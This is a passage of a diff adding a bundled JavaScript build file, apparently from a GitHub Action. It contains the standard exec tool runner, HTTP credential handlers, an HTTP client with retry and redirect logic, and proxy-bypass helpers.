(!optionsNonNull.silent && + optionsNonNull.errStream && + optionsNonNull.outStream) { + const s = optionsNonNull.failOnStdErr + ? optionsNonNull.errStream + : optionsNonNull.outStream; + s.write(data); + } + errbuffer = this._processLineBuffer(data, errbuffer, (line) => { + if (this.options.listeners && this.options.listeners.errline) { + this.options.listeners.errline(line); + } + }); + }); + } + cp.on('error', (err) => { + state.processError = err.message; + state.processExited = true; + state.processClosed = true; + state.CheckComplete(); + }); + cp.on('exit', (code) => { + state.processExitCode = code; + state.processExited = true; + this._debug(`Exit code ${code} received from tool '${this.toolPath}'`); + state.CheckComplete(); + }); + cp.on('close', (code) => { + state.processExitCode = code; + state.processExited = true; + state.processClosed = true; + this._debug(`STDIO streams have closed for tool '${this.toolPath}'`); + state.CheckComplete(); + }); + state.on('done', (error, exitCode) => { + if (stdbuffer.length > 0) { + this.emit('stdline', stdbuffer); + } + if (errbuffer.length > 0) { + this.emit('errline', errbuffer); + } + cp.removeAllListeners(); + if (error) { + reject(error); + } + else { + resolve(exitCode); + } + }); + if (this.options.input) { + if (!cp.stdin) { + throw new Error('child process missing stdin'); + } + cp.stdin.end(this.options.input); + } + })); + }); + } +} +exports.ToolRunner = ToolRunner; +/** + * Convert an arg string to an array of args. Handles escaping + * + * @param argString string of arguments + * @returns string[] array of arguments + */ +function argStringToArray(argString) { + const args = []; + let inQuotes = false; + let escaped = false; + let arg = ''; + function append(c) { + // we only escape double quotes. + if (escaped && c !== '"') { + arg += '\\'; + } + arg += c; + escaped = false; + } + for (let i = 0; i < argString.length; i++) { + const c = argString.charAt(i); + if (c === '"') { + if (!escaped) { + inQuotes = !inQuotes; + } + else { + append(c); + } + continue; + } + if (c === '\\' && escaped) { + append(c); + continue; + } + if (c === '\\' && inQuotes) { + escaped = true; + continue; + } + if (c === ' ' && !inQuotes) { + if (arg.length > 0) { + args.push(arg); + arg = ''; + } + continue; + } + append(c); + } + if (arg.length > 0) { + args.push(arg.trim()); + } + return args; +} +exports.argStringToArray = argStringToArray; +class ExecState extends events.EventEmitter { + constructor(options, toolPath) { + super(); + this.processClosed = false; // tracks whether the process has exited and stdio is closed + this.processError = ''; + this.processExitCode = 0; + this.processExited = false; // tracks whether the process has exited + this.processStderr = false; // tracks whether stderr was written to + this.delay = 10000; // 10 seconds + this.done = false; + this.timeout = null; + if (!toolPath) { + throw new Error('toolPath must not be empty'); + } + this.options = options; + this.toolPath = toolPath; + if (options.delay) { + this.delay = options.delay; + } + } + CheckComplete() { + if (this.done) { + return; + } + if (this.processClosed) { + this._setResult(); + } + else if (this.processExited) { + this.timeout = timers_1.setTimeout(ExecState.HandleTimeout, this.delay, this); + } + } + _debug(message) { + this.emit('debug', message); + } + _setResult() { + // determine whether there is an error + let error; + if (this.processExited) { + if (this.processError) { + error = new Error(`There was an error when attempting to execute the process '${this.toolPath}'. This may indicate the process failed to start. Error: ${this.processError}`); + } + else if (this.processExitCode !== 0 && !this.options.ignoreReturnCode) { + error = new Error(`The process '${this.toolPath}' failed with exit code ${this.processExitCode}`); + } + else if (this.processStderr && this.options.failOnStdErr) { + error = new Error(`The process '${this.toolPath}' failed because one or more lines were written to the STDERR stream`); + } + } + // clear the timeout + if (this.timeout) { + clearTimeout(this.timeout); + this.timeout = null; + } + this.done = true; + this.emit('done', error, this.processExitCode); + } + static HandleTimeout(state) { + if (state.done) { + return; + } + if (!state.processClosed && state.processExited) { + const message = `The STDIO streams did not close within ${state.delay / + 1000} seconds of the exit event from process '${state.toolPath}'. This may indicate a child process inherited the STDIO streams and has not yet exited.`; + state._debug(message); + } + state._setResult(); + } +} +//# sourceMappingURL=toolrunner.js.map + +/***/ }), + +/***/ 5526: +/***/ (function(__unused_webpack_module, exports) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.PersonalAccessTokenCredentialHandler = exports.BearerCredentialHandler = exports.BasicCredentialHandler = void 0; +class BasicCredentialHandler { + constructor(username, password) { + this.username = username; + this.password = password; + } + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Basic ${Buffer.from(`${this.username}:${this.password}`).toString('base64')}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.BasicCredentialHandler = BasicCredentialHandler; +class BearerCredentialHandler { + constructor(token) { + this.token = token; + } + // currently implements pre-authorization + // TODO: support preAuth = false where it hooks on 401 + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Bearer ${this.token}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.BearerCredentialHandler = BearerCredentialHandler; +class PersonalAccessTokenCredentialHandler { + constructor(token) { + this.token = token; + } + // currently implements pre-authorization + // TODO: support preAuth = false where it hooks on 401 + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Basic ${Buffer.from(`PAT:${this.token}`).toString('base64')}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.PersonalAccessTokenCredentialHandler = PersonalAccessTokenCredentialHandler; +//# sourceMappingURL=auth.js.map + +/***/ }), + +/***/ 6255: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +/* eslint-disable @typescript-eslint/no-explicit-any */ +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.HttpClient = exports.isHttps = exports.HttpClientResponse = exports.HttpClientError = exports.getProxyUrl = exports.MediaTypes = exports.Headers = exports.HttpCodes = void 0; +const http = __importStar(__nccwpck_require__(3685)); +const https = __importStar(__nccwpck_require__(5687)); +const pm = __importStar(__nccwpck_require__(9835)); +const tunnel = __importStar(__nccwpck_require__(4294)); +const undici_1 = __nccwpck_require__(1773); +var HttpCodes; +(function (HttpCodes) { + HttpCodes[HttpCodes["OK"] = 200] = "OK"; + HttpCodes[HttpCodes["MultipleChoices"] = 300] = "MultipleChoices"; + HttpCodes[HttpCodes["MovedPermanently"] = 301] = "MovedPermanently"; + HttpCodes[HttpCodes["ResourceMoved"] = 302] = "ResourceMoved"; + HttpCodes[HttpCodes["SeeOther"] = 303] = "SeeOther"; + HttpCodes[HttpCodes["NotModified"] = 304] = "NotModified"; + HttpCodes[HttpCodes["UseProxy"] = 305] = "UseProxy"; + HttpCodes[HttpCodes["SwitchProxy"] = 306] = "SwitchProxy"; + HttpCodes[HttpCodes["TemporaryRedirect"] = 307] = "TemporaryRedirect"; + HttpCodes[HttpCodes["PermanentRedirect"] = 308] = "PermanentRedirect"; + HttpCodes[HttpCodes["BadRequest"] = 400] = "BadRequest"; + HttpCodes[HttpCodes["Unauthorized"] = 401] = "Unauthorized"; + HttpCodes[HttpCodes["PaymentRequired"] = 402] = "PaymentRequired"; + HttpCodes[HttpCodes["Forbidden"] = 403] = "Forbidden"; + HttpCodes[HttpCodes["NotFound"] = 404] = "NotFound"; + HttpCodes[HttpCodes["MethodNotAllowed"] = 405] = "MethodNotAllowed"; + HttpCodes[HttpCodes["NotAcceptable"] = 406] = "NotAcceptable"; + HttpCodes[HttpCodes["ProxyAuthenticationRequired"] = 407] = "ProxyAuthenticationRequired"; + HttpCodes[HttpCodes["RequestTimeout"] = 408] = "RequestTimeout"; + HttpCodes[HttpCodes["Conflict"] = 409] = "Conflict"; + HttpCodes[HttpCodes["Gone"] = 410] = "Gone"; + HttpCodes[HttpCodes["TooManyRequests"] = 429] = "TooManyRequests"; + HttpCodes[HttpCodes["InternalServerError"] = 500] = "InternalServerError"; + HttpCodes[HttpCodes["NotImplemented"] = 501] = "NotImplemented"; + HttpCodes[HttpCodes["BadGateway"] = 502] = "BadGateway"; + HttpCodes[HttpCodes["ServiceUnavailable"] = 503] = "ServiceUnavailable"; + HttpCodes[HttpCodes["GatewayTimeout"] = 504] = "GatewayTimeout"; +})(HttpCodes || (exports.HttpCodes = HttpCodes = {})); +var Headers; +(function (Headers) { + Headers["Accept"] = "accept"; + Headers["ContentType"] = "content-type"; +})(Headers || (exports.Headers = Headers = {})); +var MediaTypes; +(function (MediaTypes) { + MediaTypes["ApplicationJson"] = "application/json"; +})(MediaTypes || (exports.MediaTypes = MediaTypes = {})); +/** + * Returns the proxy URL, depending upon the supplied url and proxy environment variables. + * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com + */ +function getProxyUrl(serverUrl) { + const proxyUrl = pm.getProxyUrl(new URL(serverUrl)); + return proxyUrl ? proxyUrl.href : ''; +} +exports.getProxyUrl = getProxyUrl; +const HttpRedirectCodes = [ + HttpCodes.MovedPermanently, + HttpCodes.ResourceMoved, + HttpCodes.SeeOther, + HttpCodes.TemporaryRedirect, + HttpCodes.PermanentRedirect +]; +const HttpResponseRetryCodes = [ + HttpCodes.BadGateway, + HttpCodes.ServiceUnavailable, + HttpCodes.GatewayTimeout +]; +const RetryableHttpVerbs = ['OPTIONS', 'GET', 'DELETE', 'HEAD']; +const ExponentialBackoffCeiling = 10; +const ExponentialBackoffTimeSlice = 5; +class HttpClientError extends Error { + constructor(message, statusCode) { + super(message); + this.name = 'HttpClientError'; + this.statusCode = statusCode; + Object.setPrototypeOf(this, HttpClientError.prototype); + } +} +exports.HttpClientError = HttpClientError; +class HttpClientResponse { + constructor(message) { + this.message = message; + } + readBody() { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { + let output = Buffer.alloc(0); + this.message.on('data', (chunk) => { + output = Buffer.concat([output, chunk]); + }); + this.message.on('end', () => { + resolve(output.toString()); + }); + })); + }); + } + readBodyBuffer() { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { + const chunks = []; + this.message.on('data', (chunk) => { + chunks.push(chunk); + }); + this.message.on('end', () => { + resolve(Buffer.concat(chunks)); + }); + })); + }); + } +} +exports.HttpClientResponse = HttpClientResponse; +function isHttps(requestUrl) { + const parsedUrl = new URL(requestUrl); + return parsedUrl.protocol === 'https:'; +} +exports.isHttps = isHttps; +class HttpClient { + constructor(userAgent, handlers, requestOptions) { + this._ignoreSslError = false; + this._allowRedirects = true; + this._allowRedirectDowngrade = false; + this._maxRedirects = 50; + this._allowRetries = false; + this._maxRetries = 1; + this._keepAlive = false; + this._disposed = false; + this.userAgent = userAgent; + this.handlers = handlers || []; + this.requestOptions = requestOptions; + if (requestOptions) { + if (requestOptions.ignoreSslError != null) { + this._ignoreSslError = requestOptions.ignoreSslError; + } + this._socketTimeout = requestOptions.socketTimeout; + if (requestOptions.allowRedirects != null) { + this._allowRedirects = requestOptions.allowRedirects; + } + if (requestOptions.allowRedirectDowngrade != null) { + this._allowRedirectDowngrade = requestOptions.allowRedirectDowngrade; + } + if (requestOptions.maxRedirects != null) { + this._maxRedirects = Math.max(requestOptions.maxRedirects, 0); + } + if (requestOptions.keepAlive != null) { + this._keepAlive = requestOptions.keepAlive; + } + if (requestOptions.allowRetries != null) { + this._allowRetries = requestOptions.allowRetries; + } + if (requestOptions.maxRetries != null) { + this._maxRetries = requestOptions.maxRetries; + } + } + } + options(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('OPTIONS', requestUrl, null, additionalHeaders || {}); + }); + } + get(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('GET', requestUrl, null, additionalHeaders || {}); + }); + } + del(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('DELETE', requestUrl, null, additionalHeaders || {}); + }); + } + post(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('POST', requestUrl, data, additionalHeaders || {}); + }); + } + patch(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('PATCH', requestUrl, data, additionalHeaders || {}); + }); + } + put(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('PUT', requestUrl, data, additionalHeaders || {}); + }); + } + head(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('HEAD', requestUrl, null, additionalHeaders || {}); + }); + } + sendStream(verb, requestUrl, stream, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request(verb, requestUrl, stream, additionalHeaders); + }); + } + /** + * Gets a typed object from an endpoint + * Be aware that not found returns a null. Other errors (4xx, 5xx) reject the promise + */ + getJson(requestUrl, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + const res = yield this.get(requestUrl, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + postJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = yield this.post(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + putJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = yield this.put(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + patchJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = yield this.patch(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + /** + * Makes a raw http request. + * All other methods such as get, post, patch, and request ultimately call this. + * Prefer get, del, post and patch + */ + request(verb, requestUrl, data, headers) { + return __awaiter(this, void 0, void 0, function* () { + if (this._disposed) { + throw new Error('Client has already been disposed.'); + } + const parsedUrl = new URL(requestUrl); + let info = this._prepareRequest(verb, parsedUrl, headers); + // Only perform retries on reads since writes may not be idempotent. + const maxTries = this._allowRetries && RetryableHttpVerbs.includes(verb) + ? this._maxRetries + 1 + : 1; + let numTries = 0; + let response; + do { + response = yield this.requestRaw(info, data); + // Check if it's an authentication challenge + if (response && + response.message && + response.message.statusCode === HttpCodes.Unauthorized) { + let authenticationHandler; + for (const handler of this.handlers) { + if (handler.canHandleAuthentication(response)) { + authenticationHandler = handler; + break; + } + } + if (authenticationHandler) { + return authenticationHandler.handleAuthentication(this, info, data); + } + else { + // We have received an unauthorized response but have no handlers to handle it. + // Let the response return to the caller. + return response; + } + } + let redirectsRemaining = this._maxRedirects; + while (response.message.statusCode && + HttpRedirectCodes.includes(response.message.statusCode) && + this._allowRedirects && + redirectsRemaining > 0) { + const redirectUrl = response.message.headers['location']; + if (!redirectUrl) { + // if there's no location to redirect to, we won't + break; + } + const parsedRedirectUrl = new URL(redirectUrl); + if (parsedUrl.protocol === 'https:' && + parsedUrl.protocol !== parsedRedirectUrl.protocol && + !this._allowRedirectDowngrade) { + throw new Error('Redirect from HTTPS to HTTP protocol. This downgrade is not allowed for security reasons. If you want to allow this behavior, set the allowRedirectDowngrade option to true.'); + } + // we need to finish reading the response before reassigning response + // which will leak the open socket. + yield response.readBody(); + // strip authorization header if redirected to a different hostname + if (parsedRedirectUrl.hostname !== parsedUrl.hostname) { + for (const header in headers) { + // header names are case insensitive + if (header.toLowerCase() === 'authorization') { + delete headers[header]; + } + } + } + // let's make the request with the new redirectUrl + info = this._prepareRequest(verb, parsedRedirectUrl, headers); + response = yield this.requestRaw(info, data); + redirectsRemaining--; + } + if (!response.message.statusCode || + !HttpResponseRetryCodes.includes(response.message.statusCode)) { + // If not a retry code, return immediately instead of retrying + return response; + } + numTries += 1; + if (numTries < maxTries) { + yield response.readBody(); + yield this._performExponentialBackoff(numTries); + } + } while (numTries < maxTries); + return response; + }); + } + /** + * Needs to be called if keepAlive is set to true in request options. + */ + dispose() { + if (this._agent) { + this._agent.destroy(); + } + this._disposed = true; + } + /** + * Raw request. + * @param info + * @param data + */ + requestRaw(info, data) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve, reject) => { + function callbackForResult(err, res) { + if (err) { + reject(err); + } + else if (!res) { + // If `err` is not passed, then `res` must be passed. + reject(new Error('Unknown error')); + } + else { + resolve(res); + } + } + this.requestRawWithCallback(info, data, callbackForResult); + }); + }); + } + /** + * Raw request with callback. + * @param info + * @param data + * @param onResult + */ + requestRawWithCallback(info, data, onResult) { + if (typeof data === 'string') { + if (!info.options.headers) { + info.options.headers = {}; + } + info.options.headers['Content-Length'] = Buffer.byteLength(data, 'utf8'); + } + let callbackCalled = false; + function handleResult(err, res) { + if (!callbackCalled) { + callbackCalled = true; + onResult(err, res); + } + } + const req = info.httpModule.request(info.options, (msg) => { + const res = new HttpClientResponse(msg); + handleResult(undefined, res); + }); + let socket; + req.on('socket', sock => { + socket = sock; + }); + // If we ever get disconnected, we want the socket to timeout eventually + req.setTimeout(this._socketTimeout || 3 * 60000, () => { + if (socket) { + socket.end(); + } + handleResult(new Error(`Request timeout: ${info.options.path}`)); + }); + req.on('error', function (err) { + // err has statusCode property + // res should have headers + handleResult(err); + }); + if (data && typeof data === 'string') { + req.write(data, 'utf8'); + } + if (data && typeof data !== 'string') { + data.on('close', function () { + req.end(); + }); + data.pipe(req); + } + else { + req.end(); + } + } + /** + * Gets an http agent. This function is useful when you need an http agent that handles + * routing through a proxy server - depending upon the url and proxy environment variables. + * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com + */ + getAgent(serverUrl) { + const parsedUrl = new URL(serverUrl); + return this._getAgent(parsedUrl); + } + getAgentDispatcher(serverUrl) { + const parsedUrl = new URL(serverUrl); + const proxyUrl = pm.getProxyUrl(parsedUrl); + const useProxy = proxyUrl && proxyUrl.hostname; + if (!useProxy) { + return; + } + return this._getProxyAgentDispatcher(parsedUrl, proxyUrl); + } + _prepareRequest(method, requestUrl, headers) { + const info = {}; + info.parsedUrl = requestUrl; + const usingSsl = info.parsedUrl.protocol === 'https:'; + info.httpModule = usingSsl ? https : http; + const defaultPort = usingSsl ? 443 : 80; + info.options = {}; + info.options.host = info.parsedUrl.hostname; + info.options.port = info.parsedUrl.port + ? parseInt(info.parsedUrl.port) + : defaultPort; + info.options.path = + (info.parsedUrl.pathname || '') + (info.parsedUrl.search || ''); + info.options.method = method; + info.options.headers = this._mergeHeaders(headers); + if (this.userAgent != null) { + info.options.headers['user-agent'] = this.userAgent; + } + info.options.agent = this._getAgent(info.parsedUrl); + // gives handlers an opportunity to participate + if (this.handlers) { + for (const handler of this.handlers) { + handler.prepareRequest(info.options); + } + } + return info; + } + _mergeHeaders(headers) { + if (this.requestOptions && this.requestOptions.headers) { + return Object.assign({}, lowercaseKeys(this.requestOptions.headers), lowercaseKeys(headers || {})); + } + return lowercaseKeys(headers || {}); + } + _getExistingOrDefaultHeader(additionalHeaders, header, _default) { + let clientHeader; + if (this.requestOptions && this.requestOptions.headers) { + clientHeader = lowercaseKeys(this.requestOptions.headers)[header]; + } + return additionalHeaders[header] || clientHeader || _default; + } + _getAgent(parsedUrl) { + let agent; + const proxyUrl = pm.getProxyUrl(parsedUrl); + const useProxy = proxyUrl && proxyUrl.hostname; + if (this._keepAlive && useProxy) { + agent = this._proxyAgent; + } + if (this._keepAlive && !useProxy) { + agent = this._agent; + } + // if agent is already assigned use that agent. + if (agent) { + return agent; + } + const usingSsl = parsedUrl.protocol === 'https:'; + let maxSockets = 100; + if (this.requestOptions) { + maxSockets = this.requestOptions.maxSockets || http.globalAgent.maxSockets; + } + // This is `useProxy` again, but we need to check `proxyURl` directly for TypeScripts's flow analysis. + if (proxyUrl && proxyUrl.hostname) { + const agentOptions = { + maxSockets, + keepAlive: this._keepAlive, + proxy: Object.assign(Object.assign({}, ((proxyUrl.username || proxyUrl.password) && { + proxyAuth: `${proxyUrl.username}:${proxyUrl.password}` + })), { host: proxyUrl.hostname, port: proxyUrl.port }) + }; + let tunnelAgent; + const overHttps = proxyUrl.protocol === 'https:'; + if (usingSsl) { + tunnelAgent = overHttps ? tunnel.httpsOverHttps : tunnel.httpsOverHttp; + } + else { + tunnelAgent = overHttps ? tunnel.httpOverHttps : tunnel.httpOverHttp; + } + agent = tunnelAgent(agentOptions); + this._proxyAgent = agent; + } + // if reusing agent across request and tunneling agent isn't assigned create a new agent + if (this._keepAlive && !agent) { + const options = { keepAlive: this._keepAlive, maxSockets }; + agent = usingSsl ? new https.Agent(options) : new http.Agent(options); + this._agent = agent; + } + // if not using private agent and tunnel agent isn't setup then use global agent + if (!agent) { + agent = usingSsl ? https.globalAgent : http.globalAgent; + } + if (usingSsl && this._ignoreSslError) { + // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process + // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options + // we have to cast it to any and change it directly + agent.options = Object.assign(agent.options || {}, { + rejectUnauthorized: false + }); + } + return agent; + } + _getProxyAgentDispatcher(parsedUrl, proxyUrl) { + let proxyAgent; + if (this._keepAlive) { + proxyAgent = this._proxyAgentDispatcher; + } + // if agent is already assigned use that agent. + if (proxyAgent) { + return proxyAgent; + } + const usingSsl = parsedUrl.protocol === 'https:'; + proxyAgent = new undici_1.ProxyAgent(Object.assign({ uri: proxyUrl.href, pipelining: !this._keepAlive ? 0 : 1 }, ((proxyUrl.username || proxyUrl.password) && { + token: `${proxyUrl.username}:${proxyUrl.password}` + }))); + this._proxyAgentDispatcher = proxyAgent; + if (usingSsl && this._ignoreSslError) { + // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process + // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options + // we have to cast it to any and change it directly + proxyAgent.options = Object.assign(proxyAgent.options.requestTls || {}, { + rejectUnauthorized: false + }); + } + return proxyAgent; + } + _performExponentialBackoff(retryNumber) { + return __awaiter(this, void 0, void 0, function* () { + retryNumber = Math.min(ExponentialBackoffCeiling, retryNumber); + const ms = ExponentialBackoffTimeSlice * Math.pow(2, retryNumber); + return new Promise(resolve => setTimeout(() => resolve(), ms)); + }); + } + _processResponse(res, options) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { + const statusCode = res.message.statusCode || 0; + const response = { + statusCode, + result: null, + headers: {} + }; + // not found leads to null obj returned + if (statusCode === HttpCodes.NotFound) { + resolve(response); + } + // get the result from the body + function dateTimeDeserializer(key, value) { + if (typeof value === 'string') { + const a = new Date(value); + if (!isNaN(a.valueOf())) { + return a; + } + } + return value; + } + let obj; + let contents; + try { + contents = yield res.readBody(); + if (contents && contents.length > 0) { + if (options && options.deserializeDates) { + obj = JSON.parse(contents, dateTimeDeserializer); + } + else { + obj = JSON.parse(contents); + } + response.result = obj; + } + response.headers = res.message.headers; + } + catch (err) { + // Invalid resource (contents not json); leaving result obj null + } + // note that 3xx redirects are handled by the http layer. + if (statusCode > 299) { + let msg; + // if exception/error in body, attempt to get better error + if (obj && obj.message) { + msg = obj.message; + } + else if (contents && contents.length > 0) { + // it may be the case that the exception is in the body message as string + msg = contents; + } + else { + msg = `Failed request: (${statusCode})`; + } + const err = new HttpClientError(msg, statusCode); + err.result = response.result; + reject(err); + } + else { + resolve(response); + } + })); + }); + } +} +exports.HttpClient = HttpClient; +const lowercaseKeys = (obj) => Object.keys(obj).reduce((c, k) => ((c[k.toLowerCase()] = obj[k]), c), {}); +//# sourceMappingURL=index.js.map + +/***/ }), + +/***/ 9835: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.checkBypass = exports.getProxyUrl = void 0; +function getProxyUrl(reqUrl) { + const usingSsl = reqUrl.protocol === 'https:'; + if (checkBypass(reqUrl)) { + return undefined; + } + const proxyVar = (() => { + if (usingSsl) { + return process.env['https_proxy'] || process.env['HTTPS_PROXY']; + } + else { + return process.env['http_proxy'] || process.env['HTTP_PROXY']; + } + })(); + if (proxyVar) { + try { + return new URL(proxyVar); + } + catch (_a) { + if (!proxyVar.startsWith('http://') && !proxyVar.startsWith('https://')) + return new URL(`http://${proxyVar}`); + } + } + else { + return undefined; + } +} +exports.getProxyUrl = getProxyUrl; +function checkBypass(reqUrl) { + if (!reqUrl.hostname) { + return false; + } + const reqHost = reqUrl.hostname; + if (isLoopbackAddress(reqHost)) { + return true; + } + const noProxy = process.env['no_proxy'] || process.env['NO_PROXY'] || ''; + if (!noProxy) { + return false; + } + // Determine the request port + let reqPort; + if (reqUrl.port) { + reqPort = Number(reqUrl.port); + } + else if (reqUrl.protocol === 'http:') { + reqPort = 80; + } + else if (reqUrl.protocol === 'https:') { + reqPort = 443; + } + // Format the request hostname and hostname with port + const upperReqHosts = [reqUrl.hostname.toUpperCase()]; + if (typeof reqPort === 'number') { + upperReqHosts.push(`${upperReqHosts[0]}:${reqPort}`); + } + // Compare request host against noproxy + for (const upperNoProxyItem of noProxy + .split(',') + .map(x => x.trim().toUpperCase()) + .filter(x => x)) { + if (upperNoProxyItem === '*' || + upperReqHosts.some(x => x === upperNoProxyItem || + x.endsWith(`.${upperNoProxyItem}`) || + (upperNoProxyItem.startsWith('.') && + x.endsWith(`${upperNoProxyItem}`)))) { + return true; + } + } + return false; +} +exports.checkBypass = checkBypass; +function isLoopbackAddress(host) { + const hostLower = host.toLowerCase(); + return (hostLower === 'localhost' || + hostLower.startsWith('127.') || + hostLower.startsWith('[::1]') || + hostLower.startsWith('[0:0:0:0:0:0:0:1]')); +} +//# sourceMappingURL=proxy.js.map + +/***/ }), + +/***/ 1962: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +var _a; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getCmdPath = 